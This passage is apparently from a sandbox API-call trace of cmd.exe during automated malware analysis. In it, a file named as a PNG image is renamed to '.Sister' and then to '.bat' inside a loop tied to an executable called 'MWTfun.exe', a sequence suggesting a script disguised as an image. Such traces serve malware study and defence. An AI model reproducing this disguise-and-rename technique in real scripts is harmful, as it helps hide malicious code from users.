dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a14d60 [0197.235] FindClose (in: hFindFile=0x21ed9a14d60 | out: hFindFile=0x21ed9a14d60) returned 1 [0197.235] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9f30a3d0, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9f30a3d0, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a14c40 [0197.235] FindClose (in: hFindFile=0x21ed9a14c40 | out: hFindFile=0x21ed9a14c40) returned 1 [0197.236] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\YgF_fsDPEPZ_A1NWq.png", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687668f0, ftCreationTime.dwHighDateTime=0x1d5ee07, ftLastAccessTime.dwLowDateTime=0x30f0edd0, ftLastAccessTime.dwHighDateTime=0x1d5eb4e, ftLastWriteTime.dwLowDateTime=0x30f0edd0, ftLastWriteTime.dwHighDateTime=0x1d5eb4e, nFileSizeHigh=0x0, nFileSizeLow=0xf9ba, dwReserved0=0x4, dwReserved1=0x80, cFileName="YgF_fsDPEPZ_A1NWq.png", cAlternateFileName="YGF_FS~1.PNG")) returned 0x21ed9a14a60 [0197.236] FindClose (in: hFindFile=0x21ed9a14a60 | out: hFindFile=0x21ed9a14a60) returned 1 [0197.236] _wcsnicmp (_String1="YGF_FS~1.PNG", _String2="YgF_fsDPEPZ_A1NWq.png", _MaxCount=0x15) returned 26 [0197.236] malloc (_Size=0x1ff9c) returned 0x21ed971fd40 [0197.237] ??_V@YAXPEAX@Z () returned 0x21ed971fd40 [0197.238] GetProcessHeap () returned 0x21ed8c70000 [0197.238] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed937b170 [0197.238] ??_V@YAXPEAX@Z () returned 0x1 [0197.238] ??_V@YAXPEAX@Z () returned 0x1 [0197.238] GetProcessHeap () returned 0x21ed8c70000 [0197.238] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a10030, Size=0x1d0) returned 0x21ed9a10030 [0197.238] GetProcessHeap () returned 0x21ed8c70000 [0197.238] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a10030) returned 0x1d0 [0197.238] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0197.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.239] GetFileType (hFile=0x50) returned 0x2 [0197.239] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0197.239] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0197.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.274] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0197.286] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0197.286] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0197.286] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0197.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.286] GetFileType (hFile=0x50) returned 0x2 [0197.286] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0197.286] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0197.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.315] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0197.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.356] GetFileType (hFile=0x50) returned 0x2 [0197.356] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0197.356] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0197.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.384] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9570d80*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9570d80*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0197.394] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"YgF_fsDPEPZ_A1NWq.png\" \"YgF_fsDPEPZ_A1NWq.png.Sister\" ") returned 56 [0197.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.394] GetFileType (hFile=0x50) returned 0x2 [0197.394] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0197.394] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0197.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.396] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x38, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x38) returned 1 [0197.470] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0197.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.470] GetFileType (hFile=0x50) returned 0x2 [0197.470] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0197.470] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0197.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.483] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0197.499] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0197.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.499] GetFileType (hFile=0x50) returned 0x2 [0197.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0197.526] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0197.589] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.589] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0197.641] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0197.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.641] GetFileType (hFile=0x50) returned 0x2 [0197.641] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0197.641] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0197.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.703] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0197.719] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0197.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.720] GetFileType (hFile=0x50) returned 0x2 [0197.720] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0197.720] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0197.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.721] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0197.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.736] GetFileType (hFile=0x50) returned 0x2 [0197.736] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0197.736] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0197.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.749] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9a10000*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9a10000*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0197.775] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"YgF_fsDPEPZ_A1NWq.png.Sister\" \"YgF_fsDPEPZ_A1NWq.bat\" ") returned 56 [0197.775] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.775] GetFileType (hFile=0x50) returned 0x2 [0197.775] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0197.775] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0197.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.847] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x38, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x38) returned 1 [0197.935] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0197.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.935] GetFileType (hFile=0x50) returned 0x2 [0197.935] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0197.935] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0197.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0197.961] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0197.984] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0197.993] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0197.994] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0197.994] malloc (_Size=0xffce) returned 0x21ed971fd40 [0197.994] ??_V@YAXPEAX@Z () returned 0x21ed971fd40 [0197.994] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0197.994] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0197.994] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0197.994] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0197.994] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0197.994] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0197.994] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0197.994] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0197.994] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0197.994] ??_V@YAXPEAX@Z () returned 0x1 [0197.994] GetProcessHeap () returned 0x21ed8c70000 [0197.994] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf0) returned 0x21ed8d6c480 [0197.995] GetProcessHeap () returned 0x21ed8c70000 [0197.995] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c480, Size=0x80) returned 0x21ed8d6c480 [0197.995] GetProcessHeap () returned 0x21ed8c70000 [0197.995] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c480) returned 0x80 [0197.995] GetProcessHeap () returned 0x21ed8c70000 [0197.995] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x88) returned 0x21ed9379930 [0197.995] GetProcessHeap () returned 0x21ed8c70000 [0197.995] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf0) returned 0x21ed8d6c840 [0197.995] GetProcessHeap () returned 0x21ed8c70000 [0197.995] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c840, Size=0x80) returned 0x21ed8d6c840 [0197.995] GetProcessHeap () returned 0x21ed8c70000 [0197.995] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c840) returned 0x80 [0197.996] malloc (_Size=0xffce) returned 0x21ed971fd40 [0197.996] ??_V@YAXPEAX@Z () returned 0x21ed971fd40 [0197.996] GetProcessHeap () returned 0x21ed8c70000 [0197.996] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a146a0 [0197.996] GetProcessHeap () returned 0x21ed8c70000 [0197.996] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955b950 [0197.996] _wcsicmp (_String1="YgF_fsDPEPZ_A1NWq.png", _String2=".") returned 75 [0197.996] _wcsicmp (_String1="YgF_fsDPEPZ_A1NWq.png", _String2="..") returned 75 [0197.996] GetFileAttributesW (lpFileName="YgF_fsDPEPZ_A1NWq.png" (normalized: "c:\\users\\fd1hvy\\desktop\\ygf_fsdpepz_a1nwq.png")) returned 0x20 [0197.998] GetProcessHeap () returned 0x21ed8c70000 [0197.999] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9a15060 [0198.001] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9a15070 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0198.001] SetErrorMode (uMode=0x0) returned 0x0 [0198.001] SetErrorMode (uMode=0x1) returned 0x0 [0198.001] GetFullPathNameW (in: lpFileName="YgF_fsDPEPZ_A1NWq.png", nBufferLength=0x7fe7, lpBuffer=0x21ed971fd40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\YgF_fsDPEPZ_A1NWq.png", lpFilePart=0xa6cf4fd660*="YgF_fsDPEPZ_A1NWq.png") returned 0x2d [0198.001] SetErrorMode (uMode=0x0) returned 0x1 [0198.001] GetProcessHeap () returned 0x21ed8c70000 [0198.001] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955ccd0 [0198.001] _wcsicmp (_String1="YgF_fsDPEPZ_A1NWq.png", _String2=".") returned 75 [0198.001] _wcsicmp (_String1="YgF_fsDPEPZ_A1NWq.png", _String2="..") returned 75 [0198.001] GetFileAttributesW (lpFileName="YgF_fsDPEPZ_A1NWq.png" (normalized: "c:\\users\\fd1hvy\\desktop\\ygf_fsdpepz_a1nwq.png")) returned 0x20 [0198.002] ??_V@YAXPEAX@Z () returned 0x1 [0198.002] malloc (_Size=0xffce) returned 0x21ed971fd40 [0198.002] ??_V@YAXPEAX@Z () returned 0x21ed971fd40 [0198.002] malloc (_Size=0xffce) returned 0x21ed972fd20 [0198.002] ??_V@YAXPEAX@Z () returned 0x21ed972fd20 [0198.003] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\YgF_fsDPEPZ_A1NWq.png" (normalized: "c:\\users\\fd1hvy\\desktop\\ygf_fsdpepz_a1nwq.png")) returned 0x20 [0198.003] malloc (_Size=0xffce) returned 0x21ed923fd00 [0198.003] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0198.003] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\YgF_fsDPEPZ_A1NWq.png", fInfoLevelId=0x1, lpFindFileData=0x21ed955b960, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed955b960) returned 0x21ed9a14520 [0198.003] malloc (_Size=0xffce) returned 0x21ed924fce0 [0198.003] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0198.003] ??_V@YAXPEAX@Z () returned 0x1 [0198.003] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\YgF_fsDPEPZ_A1NWq.png" (normalized: "c:\\users\\fd1hvy\\desktop\\ygf_fsdpepz_a1nwq.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\YgF_fsDPEPZ_A1NWq.png.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\ygf_fsdpepz_a1nwq.png.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0198.007] FindNextFileW (in: hFindFile=0x21ed9a14520, lpFindFileData=0x21ed955b960 | out: lpFindFileData=0x21ed955b960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687668f0, ftCreationTime.dwHighDateTime=0x1d5ee07, ftLastAccessTime.dwLowDateTime=0x30f0edd0, ftLastAccessTime.dwHighDateTime=0x1d5eb4e, ftLastWriteTime.dwLowDateTime=0x30f0edd0, ftLastWriteTime.dwHighDateTime=0x1d5eb4e, nFileSizeHigh=0x0, nFileSizeLow=0xf9ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="YgF_fsDPEPZ_A1NWq.png", cAlternateFileName="")) returned 0 [0198.009] GetLastError () returned 0x12 [0198.009] FindClose (in: hFindFile=0x21ed9a14520 | out: hFindFile=0x21ed9a14520) returned 1 [0198.009] ??_V@YAXPEAX@Z () returned 0x1 [0198.010] ??_V@YAXPEAX@Z () returned 0x1 [0198.010] ??_V@YAXPEAX@Z () returned 0x1 [0198.010] ??_V@YAXPEAX@Z () returned 0x1 [0198.013] GetProcessHeap () returned 0x21ed8c70000 [0198.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14100 [0198.013] GetProcessHeap () returned 0x21ed8c70000 [0198.013] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c955c0, Size=0x16) returned 0x21ed8c95ae0 [0198.013] GetProcessHeap () returned 0x21ed8c70000 [0198.013] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95ae0) returned 0x16 [0198.014] GetProcessHeap () returned 0x21ed8c70000 [0198.014] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0198.014] GetProcessHeap () returned 0x21ed8c70000 [0198.014] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0198.014] GetProcessHeap () returned 0x21ed8c70000 [0198.014] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6c8d0 [0198.014] GetProcessHeap () returned 0x21ed8c70000 [0198.014] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c8d0, Size=0xb2) returned 0x21ed8d6c8d0 [0198.014] GetProcessHeap () returned 0x21ed8c70000 [0198.014] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c8d0) returned 0xb2 [0198.014] GetProcessHeap () returned 0x21ed8c70000 [0198.014] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9a25050 [0198.014] GetProcessHeap () returned 0x21ed8c70000 [0198.014] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a25050, Size=0x30) returned 0x21ed9a25050 [0198.014] GetProcessHeap () returned 0x21ed8c70000 [0198.014] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a25050) returned 0x30 [0198.014] GetProcessHeap () returned 0x21ed8c70000 [0198.014] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9a25090 [0198.014] malloc (_Size=0x1ff9c) returned 0x21ed971fd40 [0198.018] GetProcessHeap () returned 0x21ed8c70000 [0198.018] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937dd50 [0198.018] GetProcessHeap () returned 0x21ed8c70000 [0198.018] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937de10 [0198.018] ??_V@YAXPEAX@Z () returned 0x1 [0198.018] malloc (_Size=0x1ff9c) returned 0x21ed971fd40 [0198.018] GetProcessHeap () returned 0x21ed8c70000 [0198.018] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9571e80 [0198.019] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed971fd40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0198.019] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a14400 [0198.019] FindClose (in: hFindFile=0x21ed9a14400 | out: hFindFile=0x21ed9a14400) returned 1 [0198.019] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a14280 [0198.019] FindClose (in: hFindFile=0x21ed9a14280 | out: hFindFile=0x21ed9a14280) returned 1 [0198.019] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa0a0ddec, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa0a0ddec, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a14c40 [0198.019] FindClose (in: hFindFile=0x21ed9a14c40 | out: hFindFile=0x21ed9a14c40) returned 1 [0198.019] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa0a0ddec, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa0a0ddec, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0198.020] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0198.020] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0198.022] GetProcessHeap () returned 0x21ed8c70000 [0198.022] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d670b0 [0198.022] ??_V@YAXPEAX@Z () returned 0x1 [0198.022] ??_V@YAXPEAX@Z () returned 0x1 [0198.022] GetProcessHeap () returned 0x21ed8c70000 [0198.022] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a25090, Size=0x490) returned 0x21ed9a25090 [0198.022] GetProcessHeap () returned 0x21ed8c70000 [0198.022] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a25090) returned 0x490 [0198.022] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0198.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.022] GetFileType (hFile=0x50) returned 0x2 [0198.022] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0198.022] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0198.033] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.033] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0198.067] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0198.067] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0198.067] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0198.067] 